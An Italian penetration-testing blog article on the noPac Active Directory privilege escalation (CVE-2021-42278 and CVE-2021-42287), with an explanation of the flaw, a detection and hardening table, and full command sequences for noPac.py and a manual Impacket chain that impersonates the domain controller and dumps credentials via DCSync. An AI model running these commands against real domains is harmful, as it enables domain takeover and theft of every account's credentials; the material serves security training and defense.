cve

noPac Active Directory: exploit da utente standard a Domain Admin

noPac Active Directory: exploit da utente standard a Domain Admin

noPac su Active Directory: sfrutta CVE-2021-42278 e CVE-2021-42287 per impersonare un Domain Controller, fare DCSync e ottenere Domain Admin

  • Pubblicato il 2026-03-03
  • Tempo di lettura: 4 min

noPac è una delle catene di privilege escalation più pericolose mai viste in Active Directory. Combina CVE-2021-42278 e CVE-2021-42287 per far sì che il KDC tratti un machine account controllato dall’attaccante come se fosse il Domain Controller reale.

Il risultato operativo è diretto: impersonation del DC → DCSync → compromissione del dominio.

In un contesto offensivo reale, noPac è uno dei controlli più redditizi da provare appena ottieni credenziali valide. Se il dominio è vulnerabile, la catena password spraying → noPac → DCSync può trasformare un accesso basso in privilegio massimo in pochissimo tempo.


⚡ Perché noPac È Così Critico #

CaratteristicaImpatto
Auth richiestaSolo un utente di dominio autenticato
Vettore d’attaccoErrore logico nel flusso Kerberos/KDC
Obiettivo finaleDCSync diretto
Rapporto impatto/complessitàAltissimo

A differenza di altre escalation più lunghe, qui non ti serve una catena complessa di ACL, delegation abuse o movimento laterale preliminare: se i prerequisiti sono presenti, l’exploit è rapido e molto efficace.


📊 noPac 80/20 #

ElementoDettaglio
CVECVE-2021-42278 + CVE-2021-42287
Auth richiestaQualsiasi utente di dominio
PrerequisitoMachineAccountQuota > 0 oppure un machine account già controllato
ImpattoImpersonation del DC → DCSync
DifficoltàBassa con exploit automatico
PatchNovembre 2021

🗺️ Attack Path noPac #

text

Utente di dominio → Crea machine account → Rinomina il machine account → Confusione nel KDC → Impersona il DC → DCSync → Domain Admin

Questa è la forza di noPac: una catena corta, chiara e con impatto immediato.


🧠 Cos’è noPac #

noPac nasce dalla combinazione di due vulnerabilità:

  • CVE-2021-42278: permette di rinominare un machine account in modo pericoloso, rimuovendo il $
  • CVE-2021-42287: il KDC gestisce male la risoluzione del principal e può fare fallback sull’account del Domain Controller reale

In pratica, l’attaccante crea o controlla un computer account, lo rinomina strategicamente e sfrutta il comportamento di Kerberos per ottenere ticket che aprono la strada all’impersonation del DC.


✅ Quando Funziona #

noPac funziona quando:

  • I Domain Controller non sono patchati (patch di novembre 2021 assente)
  • MachineAccountQuota è maggiore di 0
  • L’attaccante ha credenziali valide di un utente di dominio
  • Il dominio consente ancora la creazione di computer account da parte di utenti normali

💡 Nota bene: Se il dominio è aggiornato e hardenizzato correttamente, la catena si interrompe.


🔍 Come Verificare Se Il Dominio È Attaccabile #

Il primo controllo utile è verificare il valore di MachineAccountQuota.

bash
netexec ldap DC_IP -u user -p Password123 -M maq

Se il valore è maggiore di zero, un utente di dominio standard può normalmente creare un nuovo computer account. Questo rende la catena molto più semplice da eseguire.

Segnali utili:

· ✅ Credenziali di dominio valide già ottenute · ✅ Ambiente legacy o poco aggiornato · ✅ Possibilità di aggiungere oggetti computer · ✅ Nessun hardening evidente lato Kerberos


⚙️ Exploit Rapido Con noPac.py

Per una validazione veloce, il metodo più pratico è usare noPac.py.

🔎 Scan

bash
python3 noPac.py corp.local/user:Password123 -dc-ip DC_IP -dc-host DC_HOSTNAME --scan

La modalità –scan ti permette di capire se il target è promettente senza andare subito sulla parte più invasiva.

💥 Exploit

bash
python3 noPac.py corp.local/user:Password123 -dc-ip DC_IP -dc-host DC_HOSTNAME --impersonate administrator -dump

Con –impersonate administrator -dump, la catena viene automatizzata: impersonation e tentativo di dump tramite DCSync.


🛠️ Exploit Manuale Con Impacket #

L’exploit automatico è il più veloce. L’approccio manuale con Impacket è quello migliore per capire davvero la tecnica e fare troubleshooting.

📦 Passaggi Dettagliati #

FaseComandoTool
1. Crea un machine accountimpacket-addcomputer corp.local/user:Password123 -computer-name 'NOPAC$' -computer-pass 'FakePass' -dc-ip DC_IPaddcomputer
2. Rinominalo senza $impacket-renameMachine corp.local/user:Password123 -current-name 'NOPAC$' -new-name 'DC_NAME' -dc-ip DC_IPrenameMachine
3. Richiedi un TGTimpacket-getTGT corp.local/'DC_NAME':'FakePass' -dc-ip DC_IPgetTGT
4. Ripristina il nome originaleimpacket-renameMachine corp.local/user:Password123 -current-name 'DC_NAME' -new-name 'NOPAC$' -dc-ip DC_IPrenameMachine
5. Richiedi service ticketimpacket-getST corp.local/'DC_NAME$' -spn cifs/DC.corp.local -impersonate administrator -dc-ip DC_IP -k -no-passgetST
6. Esegui DCSyncexport KRB5CCNAME=administrator@cifs_DC.corp.local@CORP.LOCAL.ccache && impacket-secretsdump corp.local/administrator@DC.corp.local -k -no-passsecretsdump

Se la catena va a buon fine, hai un impatto critico sul dominio partendo da un utente standard.


🧰 Tool Correlati (Impacket) #

Oltre ai tool usati nell’exploit, ecco altri strumenti di Impacket che potrebbero esserti utili in fase di enumerazione e post-exploit:

ToolDescrizione
GetADUsersEnumera utenti dal dominio
GetADComputersRecupera informazioni sui computer
GetNPUsersCerca utenti con Kerberos pre-autenticazione disabilitata (AS-REP Roasting)
GetLAPSPasswordEstrae password LAPS da LDAP
samrdumpDump degli account SAM
rpcdumpEnumera endpoint RPC
ntlmrelayxStrumento avanzato per NTLM relay

⚠️ Errori Comuni #

  • ❌ Non verificare MachineAccountQuota prima di partire
  • ❌ Lanciare subito l’exploit senza --scan
  • ❌ Non ripristinare il machine account nel flow manuale
  • ❌ Pensare che basti sempre “qualsiasi utente” anche su domini patchati
  • ❌ Usare solo la versione automatica senza capire il meccanismo

🌍 Contesto Reale #

Nel 2026, noPac è raro negli ambienti enterprise ben gestiti, ma resta ancora presente in:

  • 🏚️ Infrastrutture legacy
  • 🧪 Lab AD vulnerabili
  • 📉 Domini trascurati o aggiornati male

Come ZeroLogon e PrintNightmare, non è il bug che trovi ovunque — ma quando lo trovi, il valore offensivo è altissimo.

La catena più comune resta: Password-spray → noPac → DCSync #

✅ Checklist Operativa #

☐ Credenziali di dominio valide ottenute
MachineAccountQuota verificato
☐ Scan eseguito con --scan
☐ Exploit eseguito
☐ DCSync tentato o completato
☐ Cleanup del machine account effettuato
☐ Evidenze salvate per il report


🛡️ Detection / Difesa #

AzioneDescrizione
PatchApplica le patch di novembre 2021
MAQImposta MachineAccountQuota = 0
Event ID 4741Monitora creazione di computer account
Event ID 4742Monitora modifiche sospette ai machine account
KerberosControlla richieste anomale su principal macchina
ACLLimita chi può creare oggetti computer nel dominio

La combinazione davvero efficace è: patching + MAQ a zero + logging serio.


❓ FAQ #

Cos’è noPac?
È una catena di privilege escalation che combina CVE-2021-42278 e CVE-2021-42287 per permettere a un utente di dominio di impersonare un Domain Controller e arrivare fino a DCSync.

noPac funziona ancora nel 2026?
Sì, ma solo su Domain Controller non correttamente patchati. In ambienti maturi è raro; in ambienti legacy è ancora molto pericoloso.

Serve MachineAccountQuota?
Sì, se devi creare un nuovo machine account. Se MachineAccountQuota = 0, puoi comunque sfruttare la tecnica solo se controlli già un computer account.

Qual è la differenza tra noPac e ZeroLogon?
ZeroLogon segue una logica diversa e non richiede lo stesso tipo di abuso identità/Kerberos. noPac invece parte da credenziali valide e sfrutta il comportamento del KDC.

noPac è un attacco Kerberos?
Sì. Anche se parte dagli account macchina, il cuore della catena è il comportamento del KDC e il rilascio dei ticket Kerberos.


🔗 Riferimenti Esterni #


🎯 Key Takeaway #

noPac è una delle escalation più rapide e redditizie in Active Directory non patchato: da utente standard a compromissione del dominio con una catena breve, automatizzabile e ad altissimo impatto.


❤️ Supporta HackIta #

Se questo articolo ti è stato utile e vuoi contribuire alla crescita del progetto, puoi sostenere HackIta con una donazione. Anche un piccolo gesto aiuta a mantenere vivo il progetto e a produrre contenuti di qualità sulla sicurezza informatica.

👉 hackita.it/supporto


🛡️ Servizi HackIta #

Hai bisogno di qualcosa di più concreto? Offriamo anche:

  • 🎓 Formazione 1:1 — Percorsi personalizzati per ethical hacking, penetration testing e Active Directory
  • 🔥 Test di vulnerabilità per aziende/siti web — Scopri se la tua infrastruttura regge prima che lo faccia qualcun altro

👉 hackita.it/servizi

Grazie per il supporto!


Articolo aggiornato al 2026 - HackIta Security Research

#CVE Windows

DIVENTA PARTE DELL’ÉLITE DELL’HACKING ETICO.

Accedi a risorse avanzate, lab esclusivi e strategie usate dai veri professionisti della cybersecurity.

Non sono un robot

Iscrivendoti accetti di ricevere la newsletter di HACKITA. Ti puoi disiscrivere in qualsiasi momento.